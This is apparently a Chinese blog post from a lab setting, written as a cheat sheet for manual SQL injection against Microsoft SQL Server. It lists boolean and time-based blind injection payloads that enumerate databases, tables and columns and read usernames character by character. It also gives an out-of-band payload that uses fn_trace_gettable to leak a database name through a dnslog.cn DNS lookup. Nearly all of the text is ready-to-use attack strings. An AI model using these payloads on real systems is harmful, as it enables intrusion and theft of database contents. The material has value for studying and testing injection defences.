实验环境:
所有数据库名:
oa数据库所有表名
oa数据表Portal_Announcementscat:
布尔盲注:
猜测数据库数量:
先判断dbid字段是否存在:
# 这里bdid字段值一直到9都有效
id=1 and 1=(select count(*) from master.dbo.sysdatabases where dbid=5)
得到数据库名共有9个
根据dbid字段猜库名长度
# 这里的库名长度为12
id=1 and 1=(select count(*) from master.dbo.sysdatabases where dbid=5 and len(name)>4)
根据dbid字段挨个查询数据库名:
# 第一个字符为R,ASCII 码为82
id=1 and ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),1,1)) >81
# 查询第二个字符,以此类推
id=1 and ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),2,1)) >100
注释:
substring(str,start,len) 截取字符串的作用,第一个参数为要截取的字符串,第二个参数为从哪里开始截取,第三个参数为截取的长度
ascii(char) 把字符转换为ascii值
猜解表名长度:
# 查当前数据库的第一个表名长度
id=1 and 1=(select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u') and len(name)>22)
# 查当前数据库第二个表名长度,以此类推
id=1 and 1=(select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u' and name != 'Portal_Announcementscat') and len(name)=20)
# 查其他数据库的第一个表名长度,例如通过上面的语句得到数据库名 DianCMS
id=1 and 1=(select count(*) from DianCMS.dbo.sysobjects where name in (select top 1 name from DianCMS.dbo.sysobjects where xtype='u') and len(name)>1)
猜解表名:
# 猜解第一个字符:P
id=1 and 1=(select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u') and ascii(substring(name,1,1))=80)
# 猜解第二个字符:o,以此类推
id=1 and 1=(select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u') and ascii(substring(name,2,1))=111)
# 得到第一个表名为 Portal_Announcementscat,查询下一个表名,以第三个表名为例,第一个字符为 u
id=1 and 1=(select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u' and name not in ('Portal_Announcementscat','Portal_Announcements')) and ascii(substring(name,1,1))=117)
猜解列名长度:
id=1 and exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'Portal_Announcementscat') and len(name)=5)
id=1 and 1=(select count(*) from syscolumns where id = (select id from sysobjects where name = 'Portal_Announcementscat') and len(name)=5)
# 猜解下一列名长度:
id=1 and exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'Portal_Announcementscat') and name not in ('catid') and len(name)=8)
猜解列名:(推荐第一种语句)
第二个payload测试的时候发现一个问题,存在字段catid和moduleid,截取一个字段获取它的ascii值时,无论是c对应的ascii值99,还是m对应的ascii值109都能返回正确的页面,写盲注脚本的时候要注意这个问题或者换个payload,不建议使用exists
# 猜解列名第一个字符:c
id=1 and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='Portal_Announcementscat')),1,1)) =99
id=1 and exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'Portal_Announcementscat') and unicode(substring(name,1,1))=99)
# 猜解列名的第二个字符:a,以此类推
id=1 and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='Portal_Announcementscat')),2,1)) =97
id=1 and exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'Portal_Announcementscat') and unicode(substring(name,2,1))=97)
# 猜解其他列名,以此类推:
id=1 and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='Portal_Announcementscat') and name not in ('catid')),1,1)) =109
猜解数据:
# 判断opusername列第一个字符:a
id=1 and ascii(substring((select top 1 opusername from Portal_Announcementscat),1,1)) = 97
# 判断opusername列第二个字符:d,以此类推
id=1 and ascii(substring((select top 1 opusername from Portal_Announcementscat),2,1)) = 100
时间盲注:
示例:
WAITFOR DELAY '0:0:4' -- //表示延迟4秒
IF exists ()子句:
IF exists () WAITFOR DELAY '0:0:5'
判断是否存在时间盲注:
id=1 WAITFOR DELAY '0:0:5'--
判断数据库名是否存在:
# dbid 逐渐+1
id=1 if ((select count(*) from master.dbo.sysdatabases where dbid=5)=1) waitfor delay '0:0:3'--
猜库名长度:
id=1 if ((select count(*) from master.dbo.sysdatabases where dbid=9 and len(name)=2)=1) waitfor delay '0:0:5'--
猜数据库名:
# 猜第一个字符:o
id=1 if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=9),1,1)) = 111) WAITFOR DELAY '0:0:5'--
# 猜第二个字符:a,以此类推
id=1 if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=9),2,1)) = 97) WAITFOR DELAY '0:0:5'--
猜解表名长度:
# 通过上面语句得到数据名:oa
id=1 if ((select count(*) from oa.dbo.sysobjects where name in (select top 1 name from oa.dbo.sysobjects where xtype='u') and len(name)=23)=1) WAITFOR DELAY '0:0:5'--
# 查下一个表名长度,以此类推:
id=1 if ((select count(*) from oa.dbo.sysobjects where name in (select top 1 name from oa.dbo.sysobjects where xtype='u' and name not in ('Portal_Announcementscat')) and len(name)=20)=1) WAITFOR DELAY '0:0:5'--
猜解表名:
# 猜解第一个字符:P
id=1 if ((select count(*) from oa.dbo.sysobjects where name in (select top 1 name from oa.dbo.sysobjects where xtype='u') and ascii(substring(name,1,1))=80)=1) WAITFOR DELAY '0:0:5'--
# 猜解第二个字符:o,以此类推
id=1 if ((select count(*) from oa.dbo.sysobjects where name in (select top 1 name from oa.dbo.sysobjects where xtype='u') and ascii(substring(name,2,1))=111)=1) WAITFOR DELAY '0:0:5'--
# 猜解下一个表名:
id=1 if ((select count(*) from oa.dbo.sysobjects where name in (select top 1 name from oa.dbo.sysobjects where xtype='u' and name not in ('Portal_Announcementscat')) and ascii(substring(name,1,1))=80)=1) WAITFOR DELAY '0:0:5'--
猜解列名长度:
id=1 if(exists(select top 1 name from oa.dbo.syscolumns where id =(select id from oa.dbo.sysobjects where name = 'Portal_Announcementscat') and len(name)=5)) WAITFOR DELAY '0:0:5'--
id=1 if((select count(*) from oa.dbo.syscolumns where id =(select id from oa.dbo.sysobjects where name = 'Portal_Announcementscat') and len(name)=5)>0) WAITFOR DELAY '0:0:5'--
# 猜解下一个列名的长度
id=1 if(exists(select top 1 name from oa.dbo.syscolumns where id =(select id from oa.dbo.sysobjects where name = 'Portal_Announcementscat') and name not in ('catid') and len(name)=8)) WAITFOR DELAY '0:0:5'--
查询列名长度这处payload,可能会有多个相同长度的字段,目前的思路是先遍历一遍不同长度值,得到结果后写入集合,然后猜解列名的时候遍历集合。
猜解列名:
# 获取第一个字符:c
id=1 if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='Portal_Announcementscat')),1,1)) =99) WAITFOR DELAY '0:0:5'--
# 获取第二个字符:a,以此类推
id=1 if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='Portal_Announcementscat')),2,1)) =97) WAITFOR DELAY '0:0:5'--
# 猜解下一个列名:
id=1 if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='Portal_Announcementscat') and name not in ('catid')),1,1)) =109) WAITFOR DELAY '0:0:5'--
逐列猜解数据:
# 判断opusername列第一个字符:a
id=1 if (ascii(substring((select top 1 opusername from Portal_Announcementscat),1,1)) = 97) WAITFOR DELAY '0:0:5'--
# 判断opusername列第一个字符:d,以此类推
id=1 if (ascii(substring((select top 1 opusername from Portal_Announcementscat),2,1)) = 100) WAITFOR DELAY '0:0:5'--
OBB带外注入:
适用于所有MSSQL版本
id=1 and exists(select * from fn_trace_gettable('\\'+(select top 1 name from master..sysdatabases where dbid>4)+'.6etys1.dnslog.cn\1.trc',default))
后续计划:
有时间的话写一下盲注脚本,虽然感觉可能不太好写,我太菜了
参考如下
Microsoft SQL Server手注之布尔型盲注
Microsoft SQL Server手注之延时型时间盲注
MSSQL一种新的DNS带外的方式
网友评论